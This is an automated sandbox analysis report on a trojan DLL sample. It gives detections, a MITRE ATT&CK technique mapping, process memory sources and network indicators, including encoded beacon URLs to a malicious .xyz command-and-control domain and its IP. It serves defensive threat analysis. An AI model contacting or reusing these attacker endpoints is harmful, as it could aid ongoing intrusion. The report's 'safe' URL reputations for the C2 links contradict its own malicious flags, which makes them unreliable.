Source: Yara match	File source: 00000003.00000003.754897105.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887180889.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887136487.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792489565.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792387675.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754923089.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.940528675.0000000005D38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6632, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6560, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts1	Windows Management Instrumentation2	DLL Side-Loading1	DLL Side-Loading1	Obfuscated Files or Information1	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Valid Accounts1	Valid Accounts1	Software Packing2	LSASS Memory	Account Discovery1	Remote Desktop Protocol	Email Collection1	Exfiltration Over Bluetooth	Encrypted Channel12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Command and Scripting Interpreter1	Logon Script (Windows)	Access Token Manipulation1	DLL Side-Loading1	Security Account Manager	File and Directory Discovery3	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	PowerShell1	Logon Script (Mac)	Process Injection613	Masquerading1	NTDS	System Information Discovery25	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol3	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Valid Accounts1	LSA Secrets	Query Registry1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Access Token Manipulation1	Cached Domain Credentials	Security Software Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion21	DCSync	Virtualization/Sandbox Evasion21	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Process Injection613	Proc Filesystem	Process Discovery3	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Regsvr321	/etc/passwd and /etc/shadow	Application Window Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Rundll321	Network Sniffing	System Owner/User Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
2790000.dll	100%	Avira	TR/Spy.Gen
2790000.dll	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.2.loaddll32.exe.10000000.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen8	Download File
7.2.rundll32.exe.10000000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen8	Download File
7.2.rundll32.exe.4e90000.1.unpack	100%	Avira	HEUR/AGEN.1108168	Download File
0.2.loaddll32.exe.d60000.0.unpack	100%	Avira	HEUR/AGEN.1108168	Download File
3.2.regsvr32.exe.2d40000.1.unpack	100%	Avira	HEUR/AGEN.1108168	Download File

Domains

Source	Detection	Scanner	Link
tls13.taboola.map.fastly.net	1%	Virustotal	Browse
www.googleoptimize.com	1%	Virustotal	Browse
taybhctdyehfhgthp2.xyz	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://taybhctdyehfhgthp2.xyz/jdraw/TMw5yrrD58_2F_2BhR/g9tx6WwiG/Y4ETyUqNXMfs0pkiHuVm/dVQuHu9BK38oq2QYF9z/cuTLQ3u7OqALxMIyfbyNQp/gDWpeOrsyYhNN/ao8vL_2F/3dQ2wCKcTWt3EGgjtWuBFvo/JER9x_2Bw_/2FiyK5UBn9x3lTG4i/wyJNOkM0xfPY/bTj1Bitzmn0/D5CG_2FPtjEkzq/cTayMyn_2/F.crw	0%	Avira URL Cloud	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://taybhctdyehfhgthp2.xyz/jdraw/zTjbj3kKOaJ_2FHCn/EBB0ghxmT2zf/tZbW0q1dqvV/yVEV1RDmPsuUHe/9FIX_2FieCFBsfpbW1K38/dHn_2BX1vT0rKAiB/QFi0KmjZl6PH4uf/JNL9yHWEao1Jw7Ayug/0ksp4OzRe/qPXlFslPx8Je_2BMuBBh/SGrx7lyKyPKvXD05bnd/0JGzLedhoE7YtvlNRDW9VB/Smf6dY.crw	0%	Avira URL Cloud	safe
http://constitution.org/usdeclar.txtC:	0%	URL Reputation	safe
http://constitution.org/usdeclar.txtC:	0%	URL Reputation	safe
http://constitution.org/usdeclar.txtC:	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://taybhctdyehfhgthp2.xyz/favicon.ico	0%	Avira URL Cloud	safe
http://taybhctdyehfhgthp2.xyz/jdraw/DA9CpuaF1ChJieGGmxekNIf/_2Bf5dRFGl/6ha6ihRMMP4_2FTPW/uuFq9TAcj8h4/qSnVVL6dcdH/5B0njoQO8HRJ4A/GcUxJA_2B5IFHeGazw9j9/9KKhiR_2FNDslKNn/XvL5Nb3D7Leowhe/18j3DbadW1d4jdR2RZ/_2B6y0eTA/dUCR_2BcVc2Ddna9_2Fk/A65RCh8ja7G/kzkCTcCF/r.crw	0%	Avira URL Cloud	safe
http://taybhctdyehfhgthp2.xyz/jdraw/pBKH4QNe_/2BwOCg1mW3gHfkXlroYv/qwMSGdzvy41rio90Pee/xoNO_2FGsX6HBf_2FeDJF5/0Zm4ko6Y_2B7F/5nkQ7CLE/x6UrnmgoKHXkC63igNAKiIM/Lhtzb27hq2/jm8Q2hap4uiXv4gmQ/mKxqFGYK_2BR/j5HJqnO7p7O/6C_2B0biaTD1w9/N2tivlNu2ujN1Xlxq5iZI/v2iFk.crw	0%	Avira URL Cloud	safe
http://https://file://USER.ID%lu.exe/upd	0%	Avira URL Cloud	safe
http://taybhctdyehfhgthp2.xyz/jdraw/SeHkUEUxsMZP1AhS/3IlboRjollxufxg/k0C1fYozGaNykNILuY/7mbt1CT39/8yuLSdKM2t03HpRX2_2F/fjGqyiYIkzVmY7BL2T3/lJeut6ngXNw7Xsle3Ac_2F/uCeLuklVXJGPS/OHU0EBrz/suKxF4Ft_2BK7qPRfzoyHnN/GhDiNtOZSu/bj6BgaSC_2FhnYL1W/3sMLu_2F/RiRf.crw	0%	Avira URL Cloud	safe
http://taybhctdyehfhgthp2.xyz/jdraw/TMw5yrrD58_2F_2BhR/g9tx6WwiG/Y4ETyUqNXMfs0pkiHuVm/dVQuHu9BK	0%	Avira URL Cloud	safe
http://taybhctdyehfhgthp2.xyz/jdraw/E8g7ocQa8Jp_2FkJKDIXto/jGrpKFGFm3zEl/pc9Bin_2/BMwThN1Xs8wlqXtLb7cKLtC/SgG36jLoe_/2F65aot9fOJ0PDXBC/hsoWNxn2X_2B/Y6w_2BH_2FO/I1GK6y1TlNcZL2/398IfCwmPSzVTZlSZ3ktc/prVDzQkMHshmRKXt/2UqbNyiak3Vc0V_/2FJ6G0D_2F90GG7ZcC/Q_2FC1PCI/F.crw	0%	Avira URL Cloud	safe
http://taybhctdyehfhgthp2.xyz/jdraw/senUH03QWJY9zy0TGKst3cx/OBC4WplDXH/oqcxDz6cjN7h_2F8d/LfQkFQ_2Fy0T/FAoEVOXxiKp/e5g4BIHVUHnefb/KqKdZd97vSsTK6buJ9MPp/9jx2EzrYaeeWP1ma/erE06KdAoUvLcED/U3KE1nRYvwMMSqnPv9/1aDo6f8tR/MrfKrfcn0yaSbhv8m_2F/z2V0PdyA0_2FVLnznN3/BN9K6zV1nJnb/WmUYG.crw	0%	Avira URL Cloud	safe
http://taybhctdyehfhgthp2.xyz/jdraw/RLbbZoqov27/RZXl47dw7WS2hD/qIyj2qjQipAh2ErH6xoal/uDkYECdj5j	0%	Avira URL Cloud	safe
http://taybhctdyehfhgthp2.xyz/jdraw/pBKH4QNe_/2BwOCg1mW3gHfkXlroYv/qwMSGdzvy41rio90Pee/xoNO_2FG	0%	Avira URL Cloud	safe
http://taybhctdyehfhgthp2.xyz/jdraw/YfhAKSrZ_/2B_2FjO_2BEfGkA859_2/BmcHGy0Exj8cPI6312d/hMFhmCvKYhGzWSE_2F3JZz/aqG_2Fo0JgK7b/IpJP6WZQ/EwJ0P5ojrmoHc7KEeUKS_2F/dr_2FAQUA2/1o9m_2FVWjRUIwasm/FW5sGJpTKtUf/M_2FEcpAeM7/B8jNam9JQ5TnKP/12F_2FHiebPKRmxJQmXnR/gGjhIMF_2FS7t5KV/L.crw	0%	Avira URL Cloud	safe
http://taybhctdyehfhgthp2.xyz/jdraw/RLbbZoqov27/RZXl47dw7WS2hD/qIyj2qjQipAh2ErH6xoal/uDkYECdj5jTgffUh/mYJ2XVA9rwPHUy2/QjwrTGMY_2F64PN_2F/YUDgMw7p1/s2t1KKiFVgqn2ZlMG_2B/D9NyHTdv3F0qdbbbGle/lx_2BPHRlHmFCQVN9dlzs4/OJpccJSrSanUR/bzsZAfU_/2BqRTtL2elDx7sY/V.crw	0%	Avira URL Cloud	safe
http://constitution.org/usdeclar.txt	0%	URL Reputation	safe
http://constitution.org/usdeclar.txt	0%	URL Reputation	safe
http://constitution.org/usdeclar.txt	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
http://taybhctdyehfhgthp2.xyz/jdraw/1n_2BflhePO/uMnCopo6qdTrYV/FWhAJA9XLeWgIwqNDciEV/Ma2pywOVrVC7gojv/E6T3hs07V6KYbye/xvW81IAf7IZHKKI_2B/RArbctFfL/2TGsfNIzn81_2FbGpeyH/ukdp1ZDGefO14nBo8EX/nrPB_2FBmNloUapimH_2FE/RWs6DX_2B2Z0G/i8D3YZuF/j1ldvh1CQhgEI/V37EE.crw	0%	Avira URL Cloud	safe
http://taybhctdyehfhgthp2.xyz/jdraw/zTjbj3kKOaJ_2FHCn/EBB0ghxmT2zf/tZbW0q1dqvV/yVEV1RDmPsuUHe/9	0%	Avira URL Cloud	safe
http://taybhctdyehfhgthp2.xyz/jdraw/YfhAKSrZ_/2B_2FjO_2BEfGkA859_2/BmcHGy0Exj8cPI6312d/hMFhmCvK	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
wa.ui-portal.de	82.165.229.54	true	false		high
tls13.taboola.map.fastly.net	151.101.1.44	true	false	1%, Virustotal, Browse	unknown
www.mail.com	82.165.229.59	true	false		high
HHN-efz.ms-acdc.office.com	52.97.201.50	true	false		high
wa.mail.com	82.165.229.16	true	false		high
www.googleoptimize.com	142.250.180.206	true	false	1%, Virustotal, Browse	unknown
contextual.media.net	23.211.6.95	true	false		high
outlook.com	40.97.116.82	true	false		high
taybhctdyehfhgthp2.xyz	45.90.58.179	true	true	0%, Virustotal, Browse	unknown
hblg.media.net	23.211.6.95	true	false		high
lg3.media.net	23.211.6.95	true	false		high
resolver1.opendns.com	208.67.222.222	true	false		high
plusmailcom.ha-cdn.de	195.20.250.115	true	false		unknown
mail.com	82.165.229.87	true	false		high
FRA-efz.ms-acdc.office.com	52.97.144.178	true	false		high
geolocation.onetrust.com	104.20.185.68	true	false		high
edge.gycpi.b.yahoodns.net	87.248.118.22	true	false		unknown
www.msn.com	unknown	unknown	false		high
srtb.msn.com	unknown	unknown	false		high
img.img-taboola.com	unknown	unknown	true		unknown
outlook.office365.com	unknown	unknown	false		high
s.yimg.com	unknown	unknown	false		high
web.vortex.data.msn.com	unknown	unknown	false		high
s.uicdn.com	unknown	unknown	false		high
www.outlook.com	unknown	unknown	false		high
img.ui-portal.de	unknown	unknown	false		high
plus.mail.com	unknown	unknown	false		high
cvision.media.net	unknown	unknown	false		high
dl.mail.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://taybhctdyehfhgthp2.xyz/jdraw/TMw5yrrD58_2F_2BhR/g9tx6WwiG/Y4ETyUqNXMfs0pkiHuVm/dVQuHu9BK38oq2QYF9z/cuTLQ3u7OqALxMIyfbyNQp/gDWpeOrsyYhNN/ao8vL_2F/3dQ2wCKcTWt3EGgjtWuBFvo/JER9x_2Bw_/2FiyK5UBn9x3lTG4i/wyJNOkM0xfPY/bTj1Bitzmn0/D5CG_2FPtjEkzq/cTayMyn_2/F.crw	true	Avira URL Cloud: safe	unknown
http://taybhctdyehfhgthp2.xyz/jdraw/zTjbj3kKOaJ_2FHCn/EBB0ghxmT2zf/tZbW0q1dqvV/yVEV1RDmPsuUHe/9FIX_2FieCFBsfpbW1K38/dHn_2BX1vT0rKAiB/QFi0KmjZl6PH4uf/JNL9yHWEao1Jw7Ayug/0ksp4OzRe/qPXlFslPx8Je_2BMuBBh/SGrx7lyKyPKvXD05bnd/0JGzLedhoE7YtvlNRDW9VB/Smf6dY.crw	true	Avira URL Cloud: safe	unknown
http://taybhctdyehfhgthp2.xyz/favicon.ico	true	Avira URL Cloud: safe	unknown
http://taybhctdyehfhgthp2.xyz/jdraw/DA9CpuaF1ChJieGGmxekNIf/_2Bf5dRFGl/6ha6ihRMMP4_2FTPW/uuFq9TAcj8h4/qSnVVL6dcdH/5B0njoQO8HRJ4A/GcUxJA_2B5IFHeGazw9j9/9KKhiR_2FNDslKNn/XvL5Nb3D7Leowhe/18j3DbadW1d4jdR2RZ/_2B6y0eTA/dUCR_2BcVc2Ddna9_2Fk/A65RCh8ja7G/kzkCTcCF/r.crw	true	Avira URL Cloud: safe	unknown
http://taybhctdyehfhgthp2.xyz/jdraw/pBKH4QNe_/2BwOCg1mW3gHfkXlroYv/qwMSGdzvy41rio90Pee/xoNO_2FGsX6HBf_2FeDJF5/0Zm4ko6Y_2B7F/5nkQ7CLE/x6UrnmgoKHXkC63igNAKiIM/Lhtzb27hq2/jm8Q2hap4uiXv4gmQ/mKxqFGYK_2BR/j5HJqnO7p7O/6C_2B0biaTD1w9/N2tivlNu2ujN1Xlxq5iZI/v2iFk.crw	true	Avira URL Cloud: safe	unknown
http://taybhctdyehfhgthp2.xyz/jdraw/SeHkUEUxsMZP1AhS/3IlboRjollxufxg/k0C1fYozGaNykNILuY/7mbt1CT39/8yuLSdKM2t03HpRX2_2F/fjGqyiYIkzVmY7BL2T3/lJeut6ngXNw7Xsle3Ac_2F/uCeLuklVXJGPS/OHU0EBrz/suKxF4Ft_2BK7qPRfzoyHnN/GhDiNtOZSu/bj6BgaSC_2FhnYL1W/3sMLu_2F/RiRf.crw	true	Avira URL Cloud: safe	unknown
http://taybhctdyehfhgthp2.xyz/jdraw/E8g7ocQa8Jp_2FkJKDIXto/jGrpKFGFm3zEl/pc9Bin_2/BMwThN1Xs8wlqXtLb7cKLtC/SgG36jLoe_/2F65aot9fOJ0PDXBC/hsoWNxn2X_2B/Y6w_2BH_2FO/I1GK6y1TlNcZL2/398IfCwmPSzVTZlSZ3ktc/prVDzQkMHshmRKXt/2UqbNyiak3Vc0V_/2FJ6G0D_2F90GG7ZcC/Q_2FC1PCI/F.crw	true	Avira URL Cloud: safe	unknown
http://mail.com/jdraw/hRJbHpe2NUnd/Fqb6HJaKW_2/FkOSHsbbOjgHBf/KmDpJnEWchUKTqeK6k0hw/2AQJw6Tfj2Wghg40/cDBy1qgsd1Bh7XA/8XTTdRafkqQVGKHltr/VPRzK_2FJ/vWFbmfMAYjdSfOaB_2Fb/Hhjr_2BzU1ZKuqO0buX/LCyXURXRCX4qhBBiB401RQ/MfqjvWezuBF_2/FVb574obq_/2Bf0.crw	false		high
http://taybhctdyehfhgthp2.xyz/jdraw/senUH03QWJY9zy0TGKst3cx/OBC4WplDXH/oqcxDz6cjN7h_2F8d/LfQkFQ_2Fy0T/FAoEVOXxiKp/e5g4BIHVUHnefb/KqKdZd97vSsTK6buJ9MPp/9jx2EzrYaeeWP1ma/erE06KdAoUvLcED/U3KE1nRYvwMMSqnPv9/1aDo6f8tR/MrfKrfcn0yaSbhv8m_2F/z2V0PdyA0_2FVLnznN3/BN9K6zV1nJnb/WmUYG.crw	true	Avira URL Cloud: safe	unknown
http://taybhctdyehfhgthp2.xyz/jdraw/YfhAKSrZ_/2B_2FjO_2BEfGkA859_2/BmcHGy0Exj8cPI6312d/hMFhmCvKYhGzWSE_2F3JZz/aqG_2Fo0JgK7b/IpJP6WZQ/EwJ0P5ojrmoHc7KEeUKS_2F/dr_2FAQUA2/1o9m_2FVWjRUIwasm/FW5sGJpTKtUf/M_2FEcpAeM7/B8jNam9JQ5TnKP/12F_2FHiebPKRmxJQmXnR/gGjhIMF_2FS7t5KV/L.crw	true	Avira URL Cloud: safe	unknown
http://taybhctdyehfhgthp2.xyz/jdraw/RLbbZoqov27/RZXl47dw7WS2hD/qIyj2qjQipAh2ErH6xoal/uDkYECdj5jTgffUh/mYJ2XVA9rwPHUy2/QjwrTGMY_2F64PN_2F/YUDgMw7p1/s2t1KKiFVgqn2ZlMG_2B/D9NyHTdv3F0qdbbbGle/lx_2BPHRlHmFCQVN9dlzs4/OJpccJSrSanUR/bzsZAfU_/2BqRTtL2elDx7sY/V.crw	true	Avira URL Cloud: safe	unknown
http://taybhctdyehfhgthp2.xyz/jdraw/1n_2BflhePO/uMnCopo6qdTrYV/FWhAJA9XLeWgIwqNDciEV/Ma2pywOVrVC7gojv/E6T3hs07V6KYbye/xvW81IAf7IZHKKI_2B/RArbctFfL/2TGsfNIzn81_2FbGpeyH/ukdp1ZDGefO14nBo8EX/nrPB_2FBmNloUapimH_2FE/RWs6DX_2B2Z0G/i8D3YZuF/j1ldvh1CQhgEI/V37EE.crw	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 0000002F.00000002.963318861.00000251BBCC1000.00000004.00000001.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000002F.00000002.938114563.00000251ABE5F000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000002F.00000002.938114563.00000251ABE5F000.00000004.00000001.sdmp	false		high
https://wa.ui-portal.de/opt-out-transfer/mailcom/	rundll32.exe, 00000007.00000003.795720865.000000000584A000.00000004.00000040.sdmp	false		high
http://constitution.org/usdeclar.txtC:	loaddll32.exe, 00000000.00000003.886665865.0000000004318000.00000004.00000040.sdmp, regsvr32.exe, 00000003.00000003.926000939.0000000005D38000.00000004.00000040.sdmp, rundll32.exe, 00000007.00000002.942431868.0000000006548000.00000004.00000040.sdmp, control.exe, 00000032.00000003.921590323.000002009624C000.00000004.00000040.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://contoso.com/License	powershell.exe, 0000002F.00000002.963318861.00000251BBCC1000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 0000002F.00000002.963318861.00000251BBCC1000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://https://file://USER.ID%lu.exe/upd	loaddll32.exe, 00000000.00000003.886665865.0000000004318000.00000004.00000040.sdmp, regsvr32.exe, 00000003.00000003.926000939.0000000005D38000.00000004.00000040.sdmp, rundll32.exe, 00000007.00000002.942431868.0000000006548000.00000004.00000040.sdmp, control.exe, 00000032.00000003.921590323.000002009624C000.00000004.00000040.sdmp	false	Avira URL Cloud: safe	low
http://taybhctdyehfhgthp2.xyz/jdraw/TMw5yrrD58_2F_2BhR/g9tx6WwiG/Y4ETyUqNXMfs0pkiHuVm/dVQuHu9BK	loaddll32.exe, 00000000.00000002.936200566.0000000002250000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.937464403.0000000003A40000.00000002.00000001.sdmp, powershell.exe, 0000002F.00000002.936379966.00000251AA760000.00000002.00000001.sdmp, control.exe, 00000032.00000000.914635032.00000200948F0000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 0000002F.00000002.938114563.00000251ABE5F000.00000004.00000001.sdmp	false		high
http://taybhctdyehfhgthp2.xyz/jdraw/RLbbZoqov27/RZXl47dw7WS2hD/qIyj2qjQipAh2ErH6xoal/uDkYECdj5j	control.exe, 00000032.00000000.914635032.00000200948F0000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://taybhctdyehfhgthp2.xyz/jdraw/pBKH4QNe_/2BwOCg1mW3gHfkXlroYv/qwMSGdzvy41rio90Pee/xoNO_2FG	loaddll32.exe, 00000000.00000002.936200566.0000000002250000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.937464403.0000000003A40000.00000002.00000001.sdmp, powershell.exe, 0000002F.00000002.936379966.00000251AA760000.00000002.00000001.sdmp, control.exe, 00000032.00000000.917390433.00000200948F0000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://constitution.org/usdeclar.txt	loaddll32.exe, 00000000.00000003.886665865.0000000004318000.00000004.00000040.sdmp, regsvr32.exe, 00000003.00000003.926000939.0000000005D38000.00000004.00000040.sdmp, rundll32.exe, 00000007.00000002.942431868.0000000006548000.00000004.00000040.sdmp, control.exe, 00000032.00000003.921590323.000002009624C000.00000004.00000040.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://contoso.com/	powershell.exe, 0000002F.00000002.963318861.00000251BBCC1000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 0000002F.00000002.963318861.00000251BBCC1000.00000004.00000001.sdmp	false		high
http://taybhctdyehfhgthp2.xyz/jdraw/zTjbj3kKOaJ_2FHCn/EBB0ghxmT2zf/tZbW0q1dqvV/yVEV1RDmPsuUHe/9	loaddll32.exe, 00000000.00000002.936200566.0000000002250000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.937464403.0000000003A40000.00000002.00000001.sdmp, powershell.exe, 0000002F.00000002.936379966.00000251AA760000.00000002.00000001.sdmp, control.exe, 00000032.00000000.914635032.00000200948F0000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 0000002F.00000002.937086624.00000251ABC51000.00000004.00000001.sdmp, powershell.exe, 00000034.00000002.933509067.0000015F80001000.00000004.00000001.sdmp	false		high
http://taybhctdyehfhgthp2.xyz/jdraw/YfhAKSrZ_/2B_2FjO_2BEfGkA859_2/BmcHGy0Exj8cPI6312d/hMFhmCvK	loaddll32.exe, 00000000.00000002.936200566.0000000002250000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.937464403.0000000003A40000.00000002.00000001.sdmp, powershell.exe, 0000002F.00000002.936379966.00000251AA760000.00000002.00000001.sdmp, control.exe, 00000032.00000000.914635032.00000200948F0000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://s.uicdn.com/mailint/9.1722.0/assets/potec.core.min.js	rundll32.exe, 00000007.00000003.795720865.000000000584A000.00000004.00000040.sdmp	false		high
https://s.uicdn.com/mailint/9.1722.0/	rundll32.exe, 00000007.00000003.795720865.000000000584A000.00000004.00000040.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
195.20.250.115	plusmailcom.ha-cdn.de	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	false
45.90.58.179	taybhctdyehfhgthp2.xyz	Bulgaria	204957	GREENFLOID-ASUA	true
142.250.180.206	www.googleoptimize.com	United States	15169	GOOGLEUS	false
52.97.144.178	FRA-efz.ms-acdc.office.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
82.165.229.87	mail.com	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	false
52.97.201.50	HHN-efz.ms-acdc.office.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
40.101.81.146	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
40.97.148.226	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
52.97.233.34	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
87.248.118.22	edge.gycpi.b.yahoodns.net	United Kingdom	203220	YAHOO-DEBDE	false
40.101.137.18	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
151.101.1.44	tls13.taboola.map.fastly.net	United States	54113	FASTLYUS	false
82.165.229.16	wa.mail.com	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	false
104.20.185.68	geolocation.onetrust.com	United States	13335	CLOUDFLARENETUS	false
82.165.229.59	www.mail.com	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	false
82.165.229.54	wa.ui-portal.de	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	false
40.97.116.82	outlook.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
40.101.136.2	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	444655
Start date:	06.07.2021
Start time:	14:28:41
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 14m 8s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	2790000.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	62
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winDLL@82/256@56/19
EGA Information:	Failed
HDC Information:	Successful, ratio: 96.2% (good quality ratio 91.1%) Quality average: 80% Quality standard deviation: 28.4%
HCA Information:	Successful, ratio: 91% Number of executed functions: 123 Number of non-executed functions: 207
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .dll
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, ielowutil.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 13.88.21.125, 23.211.6.115, 23.203.80.193, 13.107.40.203, 204.79.197.200, 13.107.21.200, 80.67.82.209, 80.67.82.240, 65.55.44.109, 52.255.188.83, 23.211.6.95, 131.253.33.203, 168.61.161.212, 20.82.209.183, 152.199.19.161, 20.54.104.15, 40.112.88.60, 20.54.7.98, 23.211.5.43, 142.250.180.232, 80.67.82.211, 80.67.82.235, 20.50.102.62, 93.184.220.29, 173.222.108.226, 173.222.108.210 Excluded domains from analysis (whitelisted): cs9.wac.phicdn.net, e11290.dspg.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, au-bg-shim.trafficmanager.net, www.bing.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, cvision.media.net.edgekey.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, a1999.dscg2.akamai.net, web.vortex.data.trafficmanager.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, s.uicdn.com.edgekey.net, cs9.wpc.v0cdn.net, 